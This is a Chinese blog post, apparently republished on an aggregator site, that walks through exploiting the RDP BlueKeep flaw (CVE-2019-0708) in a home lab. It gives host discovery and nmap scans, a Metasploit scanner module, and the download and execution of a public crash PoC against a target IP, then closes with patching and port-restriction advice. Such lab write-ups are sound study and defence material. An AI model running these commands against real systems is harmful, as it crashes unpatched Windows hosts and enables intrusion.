当前位置:首页 » 《随便一记》 » 正文

cve-2019-07-08_m_de_g的博客

16 人参与  2022年03月12日 18:14  分类 : 《随便一记》  评论

点击全文阅读


cve-2019-07-08——RDP漏洞利用

一、影响的系统版本

(1)Window2003
(2)Window2008
(3)Window2008 R2
(4)Window xp
(5)Window7

二、测试环境

kali ip:192.168.158.130
靶机ip:192.168.158.139
靶机搭建,请参考我的另一篇博客
https://blog.csdn.net/m_de_g/article/details/119957223?spm=1001.2014.3001.5501

三、思路

1.内网端口扫描

arp-scan -l

在这里插入图片描述

得到靶机的IP:192.168.158.139

2.nmap扫描查看靶机开放的端口

nmap -sS 192.168.158.139

在这里插入图片描述
发现靶机开放了3389端口

3.启动msf

msfconsole

在这里插入图片描述
4.查找能力利用0708的攻击模块

search 0708

在这里插入图片描述
5.选择合适的攻击模块

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep

在这里插入图片描述

6.查看需要设置的参数

show options 

在这里插入图片描述
7.发现了没有设置好攻击目标的IP

set rhosts 192.168.158.139

在这里插入图片描述
8.设置好参数之后,执行run
在这里插入图片描述
9.发现目标主机存在0708的漏洞,可以进行攻击

四、漏洞攻击

1.因为kali没有pip3,所以我们在使用前应当先安装pip3,再安装impacket库

apt-get install python3-pip
pip3 install impacket

2.下载POC

git clone https://github.com/n1xbyte/CVE-2019-0708.git
cd CVE-2019-0708

3.进行攻击

python3 crashpoc.py 192.168.158.139 64         //后面的64是版本号

在这里插入图片描述

在这里插入图片描述

五、漏洞修复

(1)及时打对应系统的安全补丁
(2)关闭3389端口或添加防火墙安全策略限制对3389端口的访问
(3)打不了补丁的可以开启远程桌面(网络级别身份验证(NLA)),可以临时防止漏洞攻击

六、参考链接

https://blog.csdn.net/weixin_44677409/article/details/94552370


点击全文阅读


本文链接:http://m.zhangshiyu.com/post/36109.html

靶机  攻击  漏洞  
<< 上一篇 下一篇 >>

  • 评论(0)
  • 赞助本站

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

最新文章

  • 山海不相逢内容精选(温逸尘沈衿)_山海不相逢内容精选(温逸尘沈衿)
  • (番外)+(全书)霍沉洲沈青禾此去经年人未还(霍沉洲沈青禾)_(霍沉洲沈青禾此去经年人未还)列表_笔趣阁(霍沉洲沈青禾)
  • (番外)+(全书)霍沉洲沈青禾(此去经年人未还霍沉洲沈青禾)完结_(霍沉洲沈青禾)列表_笔趣阁(此去经年人未还霍沉洲沈青禾)
  • 「重回八零,拒绝替嫁冲喜」章节彩蛋限时释出‌_卫东玉兰苏夏人气小说未删减节选
  • 重生七零祁同伟不再是农民儿子结局+番外纯净版全书免费重生七零祁同伟不再是农民儿子结局+番外纯净版全书免费
  • 傅雅宁的神女老婆,却在背地承欢作乐顾尘傅雅宁全书在线
  • 全文神女老婆,却在背地承欢作乐全局(顾尘傅雅宁)列表_全文神女老婆,却在背地承欢作乐全局
  • (番外)+(全书)此去经年人未还全书+番外+后续免费下载_(沈青禾霍沉洲)此去经年人未还全书+番外+后续列表_笔趣阁(沈青禾霍沉洲)
  • 完结文毁容的姐姐和瞎眼的我离开后,姜家两兄弟悔哭了+后续列表_完结文毁容的姐姐和瞎眼的我离开后,姜家两兄弟悔哭了+后续(林梦婉)
  • 妻子辱我爸受贿自杀,我掏出一等军功章节选推荐_[陈素云辰朋友]小说精彩章节分享
  • 全书浏览苔藓爬满旧日诺言新上(顾砚廷慕晚夏)_苔藓爬满旧日诺言新上(顾砚廷慕晚夏)全书结局
  • 顾尘傅雅宁(神女老婆,却在背地承欢作乐+后续+结局)结局_(顾尘傅雅宁神女老婆,却在背地承欢作乐+后续+结局全书结局)结局列表_笔趣阁(顾尘傅雅宁)

    关于我们 | 我要投稿 | 免责申明

    Copyright © 2020-2022 ZhangShiYu.com Rights Reserved.豫ICP备2022013469号-1